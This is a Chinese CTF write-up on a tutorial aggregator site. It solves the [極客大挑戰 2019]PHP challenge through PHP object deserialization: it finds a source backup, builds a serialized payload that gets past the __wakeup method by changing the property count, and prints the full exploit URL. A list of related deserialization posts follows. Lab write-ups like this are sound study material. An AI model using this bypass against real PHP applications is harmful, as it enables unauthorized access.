2. 程式人生 > 實用技巧 >幾道php反序列化題目

幾道php反序列化題目

阿新 發佈:2020-10-25

[極客大挑戰 2019]PHP

提示原始碼洩漏,來用掃描器掃一下
掃出來www.zip,然後下載下來

有五個檔案,程式碼審計一下

這個地方有一個可以反序列化的點,找到類

邏輯很簡單,username=admin password=100即可
但是有一個wakeup魔術方法會將我們的username=guest,改物件屬性個數繞過即可

本地寫個測試檔案來找payload

<?php
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();


        }
    }
}

$name = new Name('admin','100');
echo serialize($name);

// payload     O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

然後注意是私有屬性,別忘了加%00

payload = http://00ec61b4-c182-4e4c-9b0e-e733a0d2ebc7.node3.buuoj.cn/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;s:3:%22100%22;}

得到flag

相關推薦

php序列題目

[極客大挑戰 2019]PHP 提示原始碼洩漏,來用掃描器掃一下 掃出來www.zip,然後下載下來

淺析PHP序列中過濾函式使用不當導致的物件注入問題

1.漏洞產生的原因 #### 正常的序列語句是這樣的 $a=\'a:2:{s:8:\"username\";s:7:\"dimpl3s\";s:8:\"password\";s:6:\"abcdef\";}\';

php序列長度變化尾部字串逃逸(0CTF-2016-piapiapia)

一個很可愛的登入介面: 進行一下目錄掃描,發現原始碼洩露www.zip,把原始碼給出:

詳解php序列

1 前言 最近也是在複習之前學過的內容,感覺對PHP序列的理解更加深了,所以在此總結一下

PHP序列字元逃逸

序列的特點 PHP序列時,底層程式碼是以;作為欄位的分隔,以}作為結尾(字串除外),並且是根據長度判斷內容的。

PHP 序列漏洞入門學習筆記

參考文章: PHP序列漏洞入門 easy_serialize_php wp 實戰經驗丨PHP序列漏洞總結

PHP序列

概述 序列serialize()序列說通俗點就是把一個物件變成可以傳輸的字串,比如下面是一個物件:

php序列淺談

0x01 serialize()和unserialize() 先介紹下個函式 serialize()是用於將類轉換為一個字串

php序列到getshell

0x01 掃描存活,埠 C:\\Users\\Administrator>nmap -sn -PR -T 4 192.168.18.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-16 16:00 ?D1ú±ê×?ê±??

PHP序列鏈挖掘

參考文章 最新出了 yii2 RCE的鏈,但是最新版的已經被修復了,接下來自己嘗試看能不能自己找到其他鏈

pikachu-PHP序列

概述 序列serialize() 序列說通俗點就是把一個物件變成可以傳輸的字串,比如下面是一個物件:

PHP 序列——入門

0x00 引言 什麼是序列 序列 類物件在儲存的過程中需要將物件的資訊轉換為可以傳輸的形式,故將物件進行序列

PHP序列漏洞

1.什麼是序列化反序列化PHP序列化就是將各種型別的資料物件轉換成一定的格式儲存,其目的是為了將一個物件通過可儲存的位元組方式儲存起來這樣就可以將學列位元組儲存到資料庫或者文本當中,當需要的時候再

2019極客大挑戰PHP序列

1. 進入題目看到一隻貓和提示備份的習慣。猜測可能有原始碼洩露,通過目錄掃描工具可以獲取到備份檔案:www.zip包含其原始碼。 2. 對其原始碼進行審計  a. index.php 包含檔案index.php;通過get方式獲取一個引數

BUUCTF PHP序列

[極客大挑戰 2019]PHP 知識點 1、public、protected與private在序列時的區別: protected屬性被序列的時候屬性值會變成%00*%00屬性名

細說php序列字元逃逸

本文首發於“合天網安實驗室”作者:第二夢 本文涉及的實操——實驗:PHP序列漏洞實驗(合天網安實驗室)

CTF-Web-PHP序列

概念解釋 PHP 序列漏洞又叫做 PHP 物件注入漏洞,我覺得這個表達很不直白,也不能說明根本的問題,不如我們叫他 PHP 物件的屬性篡改漏洞好了(別說這是我說的~~)

[CTF]php序列(unserialize)利用

技術標籤:WEB安全phpweb滲透測試unctf [CTF]php序列(unserialize)利用 PHP序列序列介紹

[web安全原理]PHP序列漏洞

技術標籤:字串javapythonphp程式語言 前言 這天一直在關注新管狀病毒,從微博到各大公眾號朋友圈瞭解感覺挺嚴重的看微博感覺特別嚴重看官方說法感覺還行那就取中間的吧 自己要會對這個東西要有理性的判斷。關

php序列字串逃逸

php序列字串逃逸 最近在做ctfshow上得web入門序列以及php特性的部分,講講序列字串逃逸把。`